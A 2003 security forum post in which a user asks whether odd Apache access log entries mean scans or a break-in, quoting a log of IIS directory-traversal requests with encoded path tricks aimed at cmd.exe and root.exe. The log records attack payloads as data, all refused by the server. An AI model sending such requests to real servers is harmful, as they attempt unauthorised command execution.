|
-
March 4th, 2003, 08:38 PM
#1
Apache Security Question
I am getting odd access log entrys
My question is are these just scans or have they hacked my webserver?
If they have hacked my server how can i monitor there activities?
Here is part of my log
24.153.55.96 - - [22/Oct/2002:22:33:42 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
24.153.55.96 - - [22/Oct/2002:22:33:43 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
24.153.55.96 - - [22/Oct/2002:22:33:43 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.153.55.96 - - [22/Oct/2002:22:33:44 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.153.55.96 - - [22/Oct/2002:22:33:44 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.153.55.96 - - [22/Oct/2002:22:33:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:46 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.153.55.96 - - [22/Oct/2002:22:33:49 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
When you connect to your ISP, you are potentially opening your computer to the world. There are \'naughty people\' out there who enjoy breaking into other people\'s computers. Give some thought to the security of your computer...
http://www.AntiOnline.com/sig.php?imageid=360
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote